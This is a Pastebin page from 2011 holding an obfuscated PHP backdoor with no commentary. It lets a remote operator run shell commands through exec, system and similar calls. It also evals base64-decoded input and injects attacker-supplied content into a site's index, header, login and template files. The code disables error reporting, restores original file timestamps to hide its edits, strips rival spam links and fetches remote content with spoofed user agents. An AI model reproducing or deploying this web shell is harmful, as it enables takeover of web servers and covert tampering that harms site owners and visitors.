Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!

Untitled

By: johnburn on Nov 27th, 2011  |  syntax: PHP  |  size: 22.54 KB  |  views: 166  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <?php
  2. if (!function_exists('emo')) {
  3.     function emo($i) {
  4.         $a = Array("", "_", "_", "\\", "/", "//", ".", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008092215 Firefox/3.0.1", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Gecko/20030504 Mozilla Firebird/0.6", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10", 'safe_mode', 'open_basedir', "http://", "", "#/#", "/", "", "", "/", "/", "Accept-Language: en-us, en;q=0.50\r\n", "Connection: Close\r\n\r\n", "\r\n\r\n", "\n", "<br />", "", "/Location\:/", "Location: ", "\r", "\r\n\r\n", "", "&#76&#111&#99&#97&#116&#105&#111&#110&#58", "Location:", 'allow_url_fopen', '1', "<h5 style='color:maroon'>Can't download ", " - EXIT;</h5>", '', "", "safe_mode", "open_basedir", "safe_mode_include_dir", "safe_mode_exec_dir", "disable_functions", "allow_url_fopen", 'max_execution_time', 'output_buffering', 'memory_limit', '64M', 'error_log', 'log_errors', 'file_uploads', 'allow_url_fopen', 'max_execution_time', 'output_buffering', 'memory_limit', '64M', 'error_log', 'log_errors', 'file_uploads', 'allow_url_fopen', 'DOCUMENT_ROOT', 'DOCUMENT_ROOT', '\\', '/', 'SCRIPT_FILENAME', 'PHP_SELF', "(\.ph.*$|\.htm.*$|\.shtm.*$|\.asp.*$|\.jsp$|\.jhtm$|\.cfm$|\.ctp$|\.tpl$)", "/<ad>.*<\/ad>/si", "/<ads>.*<\/ads>/si", "/<bb1>.*<bb2>/si", "/<b1>.*<\/b1>/si", "/<bb1><bb1>/si", "/<bb2><bb2>/si", "/<ad>.*<\/ad>/s", "/<ems>.*<\/ems>/s", "/<block>.*<\/block>/s", "/<dig>.*<\/dig>/s", "/<centr>.*<\/centr>/s", "/<cits>.*<\/cits>/s", "/<tbt>.*<\/tbt>/s", "/<(span|font|div) style=.*(height|width)\s*:\s*[0-2]{1}\s*(pt|px).*(overflow|visibility)\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi", "/<(span|font|div) style=.*(overflow|visibility)\s*:\s*(auto|hidden).*(height|width)\s*:\s*[0-2]{1}\s*(pt|px).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi", "/<(span|font|div) style=.*visibility\s*:\s*(auto|hidden).*overflow\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi", "/<(span|font|div) style=.*overflow\s*:\s*(auto|hidden).*visibility\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi", "/wpfooterz.*wpfooterz/si", "/<a.*style\s*=.*(top|left)\s*:\s*-[0-9]{3,5}.*>.*<\/a>/Ui", "<ad>|</ad>", "<ems>| </ems>", "<block> |</block>", "<dig> | </dig>", "<centr>|</centr>", "<cits>|</cits>", "<tbt>|</tbt>", 'update1', "EXPC", 'update1', ',', "|", ".htm", ".shtm", "", "/<body(.*)?>/i", "/<body(.*)?>/i", "/<\/body(.*)?>/i", "/<\/body(.*)?>/i", "/<\/html>/i", "</body>", "/<\/html>/i", "</body></html>", "w+", 'update2', 'update2', 'SCRIPT_FILENAME', '/', '1.php', '1.php', '/^\<\?php.*\?\>/Usi', '', "w", "<pre>update</pre>", 'update3', "<pre>", 'update3', '', "\n", "r", "", "</pre>", 'add1', "EXPC", 'add1', ',', "/var\sst1(.*)gr0\=0\;/i", "", "w", "ev1", "ev1", "info1", 'dGVzdDEyOA==', "<!-- #a#", "get1", 'get1', 'DOCUMENT_ROOT', "((^.*index.*\.|^.*default.*\.|^.*main.*\.|^.*body.*\.|^.*login.*\.|^.*content.*\.|^.*auth.*\.|^.*footer.*\.|^.*header.*\.|^.*home.*\.|^.*templ.*\.|^.*inc.*\.|^.*page.*\.|^.*bottom.*\.|^.*theme.*\.)(ph.*$|htm.*$|shtm.*$|asp.*$|jsp$|jhtml$|cfm$|tpl$|inc$|pl$|template$|xml$|sht$|ctp$))", "<b1><!--", "--></b1>", "", "/<body(.*)?>/i", "/<body(.*)?>/i", "/<\/body(.*)?>/i", "/<\/body(.*)?>/i", "/<\/html>/i", "</body>", "/<\/html>/i", "w+", "", "w+", "get2", 'get2', 'DOCUMENT_ROOT', "/script.*src\s?=\s?(\"|')(.*\.js)(\?|\/|\"|')/Ui", '/^http/i', '/');
  5.         return $a[$i];
  6.     }
  7. }
  8. if (!function_exists('rndc')) {
  9.     function rndc() {
  10.         $y_0 = round(0 + 1);
  11.         $y_1 = round(0 + 1.6 + 1.6 + 1.6 + 1.6 + 1.6);
  12.         $y_2 = emo(0);
  13.         for ($y_3 = round(0);$y_3 < $y_1;$y_3++) {
  14.             $y_4 = mt_rand(round(0 + 1), round(0 + 3.5 + 3.5));
  15.             switch ($y_4) {
  16.                 case ($y_4 <= round(0 + 0.5 + 0.5 + 0.5 + 0.5)):
  17.                     $y_2.= mt_rand(round(0), round(0 + 4.5 + 4.5));
  18.                 break;
  19.                 case ($y_4 <= round(0 + 0.8 + 0.8 + 0.8 + 0.8 + 0.8)):
  20.                     $y_2.= chr(mt_rand(round(0 + 32.5 + 32.5), round(0 + 45 + 45)));
  21.                 break;
  22.                 case ($y_4 <= round(0 + 3 + 3)):
  23.                     $y_2.= chr(mt_rand(round(0 + 19.4 + 19.4 + 19.4 + 19.4 + 19.4), round(0 + 61 + 61)));
  24.                 break;
  25.                 case round(0 + 2.33333333333 + 2.33333333333 + 2.33333333333):
  26.                     $y_5 = strlen($y_2);
  27.                     if ($y_0 > round(0) && $y_5 > round(0) && $y_5 < ($y_1 - round(0 + 1)) && $y_2[$y_5 - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2) ] != emo(1)) {
  28.                         $y_2.= emo(2);
  29.                         $y_0--;
  30.                     } else {
  31.                         $y_3--;
  32.                         continue;
  33.                     }
  34.                 break;
  35.             }
  36.         }
  37.         return $y_2;
  38.     }
  39. }
  40. if (!function_exists('strrevpos')) {
  41.     function strrevpos($y_6, $y_7) {
  42.         $y_8 = strpos(strrev($y_6), strrev($y_7));
  43.         if ($y_8 === false) return false;
  44.         else return strlen($y_6) - $y_8 - strlen($y_7);
  45.     }
  46. }
  47. if (!function_exists('after')) {
  48.     function after($this, $y_9) {
  49.         if (!is_bool(strpos($y_9, $this))) return substr($y_9, strpos($y_9, $this) + strlen($this));
  50.     }
  51. }
  52. if (!function_exists('after_last')) {
  53.     function after_last($this, $y_9) {
  54.         if (!is_bool(strrevpos($y_9, $this))) return substr($y_9, strrevpos($y_9, $this) + strlen($this));
  55.     }
  56. }
  57. if (!function_exists('before')) {
  58.     function before($this, $y_9) {
  59.         return substr($y_9, round(0), strpos($y_9, $this));
  60.     }
  61. }
  62. if (!function_exists('before_last')) {
  63.     function before_last($this, $y_9) {
  64.         return substr($y_9, round(0), strrevpos($y_9, $this));
  65.     }
  66. }
  67. if (!function_exists('between')) {
  68.     function between($this, $y_10, $y_9) {
  69.         return before($y_10, after($this, $y_9));
  70.     }
  71. }
  72. if (!function_exists('between_last')) {
  73.     function between_last($this, $y_10, $y_9) {
  74.         return after_last($this, before_last($y_10, $y_9));
  75.     }
  76. }
  77. if (!function_exists('getfiles')) {
  78.     function getfiles($y_11, $y_12, $y_13 = 0, $y_14 = "\\") {
  79.         if (!is_dir($y_11)) {
  80.             return null;
  81.         };
  82.         $y_15 = ($y_14 == emo(3)) ? emo(4) : $y_14;
  83.         $y_11 = str_replace($y_14, $y_15, $y_11);
  84.         $y_11 = str_replace(emo(5), $y_15, $y_11);
  85.         $y_11 = (strrpos($y_11, $y_15) == strlen($y_11) - round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333)) ? substr($y_11, round(0), strlen($y_11) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)) : $y_11;
  86.         $y_16 = substr_count($y_11, $y_15);
  87.         $y_13 = (!$y_13) ? -round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2) : $y_13 + $y_16;
  88.         $y_17 = array();
  89.         $y_18 = array(array($y_11, $y_16));
  90.         while (sizeof($y_18) && $y_18[round(0) ][round(0 + 0.5 + 0.5) ] != $y_13) {
  91.             $y_19 = array_shift($y_18);
  92.             $y_20 = opendir($y_19[round(0) ]);
  93.             while (($y_21 = readdir($y_20)) !== false) {
  94.                 if (strrpos($y_21, emo(6)) === (strlen($y_21) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2))) {
  95.                     continue;
  96.                 };
  97.                 $y_22 = $y_19[round(0) ] . $y_15 . $y_21;
  98.                 if (is_dir($y_22)) {
  99.                     $y_23[] = $y_22;
  100.                     $y_18[] = array($y_22, substr_count($y_22, $y_15));
  101.                 } else {
  102.                     foreach($y_12 as $y_3) {
  103.                         if (preg_match($y_3, $y_21)) {
  104.                             $y_17[] = $y_22;
  105.                             break;
  106.                         };
  107.                     }
  108.                 };
  109.             };
  110.         }
  111.         return $y_17;
  112.     }
  113. }
  114. if (!function_exists('cc2')) {
  115.     function cc2($y_24) {
  116.         $y_25 = array(emo(7), emo(8), emo(9), emo(10));
  117.         if (function_exists('curl_init')) {
  118.             $y_26 = $y_25[rand(round(0), count($y_25) - round(0 + 0.25 + 0.25 + 0.25 + 0.25)) ];
  119.             $y_27 = curl_init();
  120.             curl_setopt($y_27, 10002, $y_24);
  121.             curl_setopt($y_27, 42, round(0));
  122.             curl_setopt($y_27, 13, round(0 + 30));
  123.             curl_setopt($y_27, 19913, round(0 + 0.25 + 0.25 + 0.25 + 0.25));
  124.             curl_setopt($y_27, 10018, $y_26);
  125.             if (!(@ini_get(emo(11)) || @ini_get(emo(12)))) {
  126.                 @curl_setopt($y_27, 52, round(0 + 0.5 + 0.5));
  127.             }
  128.             @curl_setopt($y_27, 68, round(0 + 0.4 + 0.4 + 0.4 + 0.4 + 0.4));
  129.             $y_28 = curl_exec($y_27);
  130.             curl_close($y_27);
  131.             if ($y_28 !== false) {
  132.                 return $y_28;
  133.             }
  134.         } else if (function_exists('fsockopen')) {
  135.             global $y_29;
  136.             $y_30 = $y_25[rand(round(0), count($y_25) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)) ];
  137.             $y_24 = str_replace(emo(13), emo(14), $y_24);
  138.             if (preg_match(emo(15), "$y_24")) {
  139.                 $y_31 = $y_24;
  140.                 $y_24 = @explode(emo(16), $y_24);
  141.                 $y_24 = $y_24[round(0) ];
  142.                 $y_31 = str_replace($y_24, emo(17), $y_31);
  143.                 if (!$y_31 || $y_31 == emo(18)) {
  144.                     $y_31 = emo(19);
  145.                 }
  146.                 $y_32 = gethostbyname($y_24);
  147.             } else {
  148.                 $y_32 = gethostbyname($y_24);
  149.                 $y_31 = emo(20);
  150.             }
  151.             $y_33 = fsockopen($y_32, round(0 + 16 + 16 + 16 + 16 + 16), $y_34, $y_35, round(0 + 10));
  152.             stream_set_timeout($y_33, round(0 + 5 + 5));
  153.             if ($y_33) {
  154.                 $y_36 = "GET $y_31 HTTP/1.0\r\n";
  155.                 $y_36.= "Host: $y_24\r\n";
  156.                 $y_36.= "Referer: http://$y_24$y_31\r\n";
  157.                 $y_36.= emo(21);
  158.                 $y_36.= "User-Agent: $y_30\r\n";
  159.                 $y_36.= emo(22);
  160.                 fputs($y_33, $y_36);
  161.                 while (!feof($y_33)) {
  162.                     $y_37.= fgets($y_33, round(0 + 1024 + 1024 + 1024 + 1024));
  163.                 }
  164.                 fclose($y_33);
  165.                 $y_37 = @explode(emo(23), $y_37, round(0 + 1 + 1));
  166.                 $y_38 = $y_37[round(0) ];
  167.                 if ($y_29) {
  168.                     $y_38 = "$y_29<br /><br />\n$y_38";
  169.                 }
  170.                 $y_38 = str_replace(emo(24), emo(25), $y_38);
  171.                 if ($y_37[round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333) ]) {
  172.                     $y_39 = $y_37[round(0 + 0.5 + 0.5) ];
  173.                 } else {
  174.                     $y_39 = emo(26);
  175.                 }
  176.                 if ($y_39) {
  177.                     $y_37 = $y_39;
  178.                 } else {
  179.                     $y_37 = $y_38;
  180.                 }
  181.                 if (preg_match(emo(27), "$y_38")) {
  182.                     $y_24 = @explode(emo(28), $y_38);
  183.                     $y_24 = $y_24[round(0 + 0.5 + 0.5) ];
  184.                     $y_24 = @explode(emo(29), $y_24);
  185.                     $y_24 = $y_24[round(0) ];
  186.                     $y_29 = str_replace(emo(30), emo(31), $y_38);
  187.                     $y_40 = emo(32);
  188.                     $y_29 = str_replace(emo(33), $y_40, $y_29);
  189.                     return cc2($y_24);
  190.                 } else {
  191.                     return $y_37;
  192.                 }
  193.             }
  194.         } else if (ini_get(emo(34)) == emo(35)) {
  195.             $y_28 = file_get_contents("http://$y_24");
  196.             if ($y_28 !== false) {
  197.                 return $y_28;
  198.             }
  199.         } else {
  200.             echo emo(36) . $y_24 . emo(37);
  201.             exit;
  202.         }
  203.     }
  204. }
  205. if (!function_exists('getcode')) {
  206.     function getcode($y_31, $y_41) {
  207.         $y_42 = emo(38);
  208.         if (preg_match("/$y_41/", $y_31)) {
  209.             $y_42 = preg_replace("/.*<b1><!--|$y_41|--><\/b1>.*/msi", emo(39), $y_31);
  210.         }
  211.         return $y_42;
  212.     }
  213. }
  214. @ignore_user_abort(round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2));
  215. @set_magic_quotes_runtime(round(0));
  216. @set_time_limit(round(0));
  217. @error_reporting(round(0));
  218. if (@function_exists('ini_restore')) {
  219.     @ini_restore(emo(40));
  220.     @ini_restore(emo(41));
  221.     @ini_restore(emo(42));
  222.     @ini_restore(emo(43));
  223.     @ini_restore(emo(44));
  224.     @ini_restore(emo(45));
  225. }
  226. if (@function_exists('ini_set')) {
  227.     @ini_set(emo(46), round(0));
  228.     @ini_set(emo(47), round(0));
  229.     @ini_set(emo(48), emo(49));
  230.     @ini_set(emo(50), NULL);
  231.     @ini_set(emo(51), round(0));
  232.     @ini_set(emo(52), round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2));
  233.     @ini_set(emo(53), round(0 + 0.5 + 0.5));
  234. } elseif (@function_exists('ini_alter')) {
  235.     @ini_alter(emo(54), round(0));
  236.     @ini_alter(emo(55), round(0));
  237.     @ini_alter(emo(56), emo(57));
  238.     @ini_alter(emo(58), NULL);
  239.     @ini_alter(emo(59), round(0));
  240.     @ini_alter(emo(60), round(0 + 1));
  241.     @ini_alter(emo(61), round(0 + 1));
  242. }
  243. if (!isset($_SERVER[emo(62) ])) $_SERVER[emo(63) ] = str_replace(emo(64), emo(65), substr($_SERVER[emo(66) ], round(0), round(0) - strlen($_SERVER[emo(67) ])));
  244. $y_43 = array(emo(68));
  245. $y_44 = array(emo(69), emo(70), emo(71), emo(72), emo(73), emo(74), emo(75), emo(76), emo(77), emo(78), emo(79), emo(80), emo(81), emo(82), emo(83), emo(84), emo(85), emo(86), emo(87));
  246. $y_45 = array(emo(88), emo(89), emo(90), emo(91), emo(92), emo(93), emo(94));
  247. if (isset($_REQUEST[emo(95) ])) {
  248.     $y_46 = explode(emo(96), gzinflate(base64_decode($_REQUEST[emo(97) ])));
  249.     $y_47 = $y_46[round(0) ];
  250.     $y_48 = explode(emo(98), $y_46[round(0 + 0.5 + 0.5) ]);
  251.     foreach($y_48 as $y_49) {
  252.         if (strlen($y_47) > round(0 + 1)) {
  253.             $y_50 = explode(emo(99), $y_45[rand(round(0), count($y_45) - round(0 + 0.5 + 0.5)) ]);
  254.             $y_47 = $y_50[round(0) ] . $y_47 . $y_50[round(0 + 0.5 + 0.5) ];
  255.         }
  256.         $y_51 = false;
  257.         $y_52 = false;
  258.         if (!is_writable($y_49)) @chmod($y_49, round(0 + 84 + 84 + 84 + 84 + 84));
  259.         if (file_exists($y_49) && is_writable($y_49)) {
  260.             $y_53 = false;
  261.             if (eregi(emo(100), $y_49) !== false || eregi(emo(101), $y_49) !== false) $y_53 = true;
  262.             $y_54 = trim(file_get_contents($y_49));
  263.             foreach($y_44 as $y_55) {
  264.                 if (preg_match($y_55, $y_54)) {
  265.                     $y_54 = preg_replace($y_55, emo(102), $y_54);
  266.                     $y_52 = true;
  267.                 }
  268.             }
  269.             if (preg_match(emo(103), $y_54, $y_56)) {
  270.                 $y_57 = $y_56[round(0) ];
  271.                 $y_54 = preg_replace(emo(104), $y_57 . $y_47, $y_54);
  272.                 $y_51 = true;
  273.             } else if (preg_match(emo(105), $y_54, $y_56)) {
  274.                 $y_57 = $y_56[round(0) ];
  275.                 $y_54 = preg_replace(emo(106), $y_47 . $y_57, $y_54);
  276.                 $y_51 = true;
  277.             } else if (preg_match(emo(107), $y_54, $y_56)) {
  278.                 $y_57 = emo(108) . $y_56[round(0) ];
  279.                 $y_54 = preg_replace(emo(109), $y_47 . $y_57, $y_54);
  280.                 $y_51 = true;
  281.             } else if ($y_53 == true) {
  282.                 $y_57 = $y_47 . emo(110);
  283.                 $y_54.= $y_57;
  284.                 $y_51 = true;
  285.             }
  286.             if ($y_51 == true || $y_52 == true) {
  287.                 $y_58 = @filemtime($y_49);
  288.                 $y_59 = fopen($y_49, emo(111));
  289.                 fwrite($y_59, $y_54);
  290.                 fclose($y_59);
  291.                 @touch($y_49, $y_58, $y_58);
  292.                 if ($y_51 == true) echo "<pre>update $y_49</pre>";
  293.                 if ($y_52 == true) echo "<pre>spam removed $y_49</pre>";
  294.             }
  295.         } else {
  296.             if (!file_exists($y_49)) echo "<pre>no file $y_49</pre>";
  297.             else if (!is_writable($y_49)) echo "<pre>no rw file $y_49</pre>";
  298.         }
  299.     }
  300. }
  301. if (isset($_REQUEST[emo(112) ])) {
  302.     $y_47 = gzinflate(base64_decode($_REQUEST[emo(113) ]));
  303.     $y_60 = $_SERVER[emo(114) ];
  304.     $y_61 = before_last(emo(115), $y_60);
  305.     if (!is_writable($y_61)) @chmod($y_61, round(0 + 210 + 210));
  306.     $y_62 = @filemtime($y_61);
  307.     @copy($y_60, $y_60 . emo(116));
  308.     @touch($y_61, $y_62, $y_62);
  309.     @touch($y_60 . emo(117), $y_62, $y_62);
  310.     if (!is_writable($y_60)) @chmod($y_60, round(0 + 420));
  311.     if (is_writable($y_60)) {
  312.         $y_54 = trim(file_get_contents($y_60));
  313.         $y_63 = preg_replace(emo(118), emo(119), $y_54);
  314.         $y_58 = @filemtime($y_60);
  315.         $y_59 = fopen($y_60, emo(120));
  316.         fwrite($y_59, $y_47 . $y_63);
  317.         fclose($y_59);
  318.         @touch($y_60, $y_58, $y_58);
  319.         echo emo(121);
  320.     } else {
  321.         echo "<pre>no rw $y_49</pre>";
  322.     }
  323. }
  324. if (isset($_REQUEST[emo(122) ])) {
  325.     echo emo(123);
  326.     $y_64 = $_REQUEST[emo(124) ];
  327.     $y_46 = emo(125);
  328.     if (!empty($y_64)) {
  329.         if (function_exists('exec')) {
  330.             @exec($y_64, $y_46);
  331.             $y_46 = join(emo(126), $y_46);
  332.         } elseif (function_exists('shell_exec')) {
  333.             $y_46 = @shell_exec($y_64);
  334.         } elseif (function_exists('system')) {
  335.             @ob_start();
  336.             @system($y_64);
  337.             $y_46 = @ob_get_contents();
  338.             @ob_end_clean();
  339.         } elseif (function_exists('passthru')) {
  340.             @ob_start();
  341.             @passthru($y_64);
  342.             $y_46 = @ob_get_contents();
  343.             @ob_end_clean();
  344.         } elseif (@is_resource($y_65 = @popen($y_64, emo(127)))) {
  345.             $y_46 = emo(128);
  346.             while (!@feof($y_65)) {
  347.                 $y_46.= @fread($y_65, round(0 + 512 + 512));
  348.             }
  349.             @pclose($y_65);
  350.         }
  351.     }
  352.     echo $y_46;
  353.     echo emo(129);
  354. }
  355. if (isset($_REQUEST[emo(130) ])) {
  356.     $y_46 = explode(emo(131), gzinflate(base64_decode($_REQUEST[emo(132) ])));
  357.     $y_47 = $y_46[round(0) ];
  358.     $y_48 = explode(emo(133), $y_46[round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333) ]);
  359.     foreach($y_48 as $y_49) {
  360.         $y_51 = false;
  361.         $y_52 = false;
  362.         if (!is_writable($y_49)) @chmod($y_49, round(0 + 420));
  363.         if (file_exists($y_49) && is_writable($y_49)) {
  364.             $y_54 = trim(file_get_contents($y_49));
  365.             $y_54 = preg_replace(emo(134), emo(135), $y_54);
  366.             $y_54 = $y_47 . $y_54;
  367.             $y_58 = @filemtime($y_49);
  368.             $y_59 = fopen($y_49, emo(136));
  369.             fwrite($y_59, $y_54);
  370.             fclose($y_59);
  371.             @touch($y_49, $y_58, $y_58);
  372.             echo "<pre>update $y_49</pre>";
  373.         } else {
  374.             if (!file_exists($y_49)) echo "<pre>no file $y_49</pre>";
  375.             else if (!is_writable($y_49)) echo "<pre>no w file $y_49</pre>";
  376.         }
  377.     }
  378. }
  379. if (isset($_REQUEST[emo(137) ])) {
  380.     $y_66 = base64_decode($_REQUEST[emo(138) ]);
  381.     eval($y_66);
  382.     exit();
  383. }
  384. if (isset($_REQUEST[emo(139) ])) {
  385.     $y_67 = emo(140);
  386.     $y_68 = @get_current_user();
  387.     echo emo(141) . base64_decode($y_67) . "(($y_68))#b#-->";
  388.     exit;
  389. }
  390. if (isset($_REQUEST[emo(142) ])) {
  391.     $y_69 = $_REQUEST[emo(143) ];
  392.     $y_70 = $_SERVER[emo(144) ];
  393.     $y_41 = rndc();
  394.     $y_71 = array(emo(145));
  395.     $y_48 = array();
  396.     $y_48 = @getfiles($y_70, $y_71, round(0 + 1.33333333333 + 1.33333333333 + 1.33333333333));
  397.     foreach($y_48 as $y_49) {
  398.         $y_51 = false;
  399.         $y_52 = false;
  400.         if (@file_exists($y_49)) {
  401.             if (!is_writable($y_49)) @chmod($y_49, round(0 + 420));
  402.             if (@is_writable($y_49)) {
  403.                 $y_72 = base64_encode(gzcompress($y_49, round(0 + 2.25 + 2.25 + 2.25 + 2.25)));
  404.                 $y_47 = emo(146) . $y_41 . $y_72 . emo(147);
  405.                 $y_54 = @trim(@file_get_contents($y_49));
  406.                 foreach($y_44 as $y_55) {
  407.                     if (preg_match($y_55, $y_54)) {
  408.                         $y_54 = preg_replace($y_55, emo(148), $y_54);
  409.                         $y_52 = true;
  410.                     }
  411.                 }
  412.                 if (preg_match(emo(149), $y_54, $y_56)) {
  413.                     $y_57 = $y_56[round(0) ];
  414.                     $y_54 = preg_replace(emo(150), $y_57 . $y_47, $y_54);
  415.                     $y_51 = true;
  416.                 } else if (preg_match(emo(151), $y_54, $y_56)) {
  417.                     $y_57 = $y_56[round(0) ];
  418.                     $y_54 = preg_replace(emo(152), $y_47 . $y_57, $y_54);
  419.                     $y_51 = true;
  420.                 } else if (preg_match(emo(153), $y_54, $y_56)) {
  421.                     $y_57 = emo(154) . $y_56[round(0) ];
  422.                     $y_54 = preg_replace(emo(155), $y_47 . $y_57, $y_54);
  423.                     $y_51 = true;
  424.                 }
  425.                 if ($y_51 == true || $y_52 == true) {
  426.                     $y_58 = @filemtime($y_49);
  427.                     $y_59 = @fopen($y_49, emo(156));
  428.                     @fwrite($y_59, $y_54);
  429.                     @fclose($y_59);
  430.                     @touch($y_49, $y_58, $y_58);
  431.                 }
  432.             }
  433.         }
  434.     }
  435.     $y_73 = cc2($y_69);
  436.     if (strlen($y_73) < round(0 + 5 + 5 + 5 + 5)) $y_73 = cc2("www.$y_69");
  437.     if (eregi($y_41, $y_73)) {
  438.         $y_73 = gzuncompress(base64_decode(getcode($y_73, $y_41)));
  439.         echo "#a#$y_73#b#";
  440.     }
  441.     foreach($y_48 as $y_49) {
  442.         $y_52 = false;
  443.         if (file_exists($y_49)) {
  444.             if (!is_writable($y_49)) @chmod($y_49, round(0 + 105 + 105 + 105 + 105));
  445.             if (is_writable($y_49)) {
  446.                 $y_54 = @trim(@file_get_contents($y_49));
  447.                 foreach($y_44 as $y_55) {
  448.                     if (preg_match($y_55, $y_54)) {
  449.                         $y_54 = preg_replace($y_55, emo(157), $y_54);
  450.                         $y_52 = true;
  451.                     }
  452.                 }
  453.                 if ($y_52 == true) {
  454.                     $y_58 = @filemtime($y_49);
  455.                     $y_59 = @fopen($y_49, emo(158));
  456.                     @fwrite($y_59, $y_54);
  457.                     @fclose($y_59);
  458.                     @touch($y_49, $y_58, $y_58);
  459.                 }
  460.             }
  461.         }
  462.     }
  463.     exit;
  464. }
  465. if (isset($_REQUEST[emo(159) ])) {
  466.     $y_74 = array();
  467.     $y_69 = $_REQUEST[emo(160) ];
  468.     $y_70 = $_SERVER[emo(161) ];
  469.     $y_75 = cc2($y_69);
  470.     if (strlen($y_75) < round(0 + 20)) $y_75 = cc2("www.$y_69");
  471.     preg_match_all(emo(162), $y_75, $y_42);
  472.     foreach($y_42[round(0 + 0.666666666667 + 0.666666666667 + 0.666666666667) ] as $y_76) {
  473.         if (preg_match(emo(163), $y_76)) {
  474.             if (preg_match("/$y_69/i", $y_76)) {
  475.                 $y_65 = $y_70 . after($y_69, $y_76);
  476.                 if (@file_exists($y_65) && @is_writable($y_65)) $y_74[] = $y_65;
  477.             }
  478.         } else {
  479.             $y_65 = $y_70 . emo(164) . $y_76;
  480.             if (@file_exists($y_65) && @is_writable($y_65)) $y_74[] = $y_65;
  481.         }
  482.     }
  483.     if (count($y_74) > round(0)) {
  484.         $y_73 = $y_74[rand(round(0), count($y_74) - round(0 + 0.25 + 0.25 + 0.25 + 0.25)) ];
  485.         echo "#a#$y_73#b#";
  486.     }
  487.     exit;
  488. } ?>
  489.  
clone this paste RAW Paste Data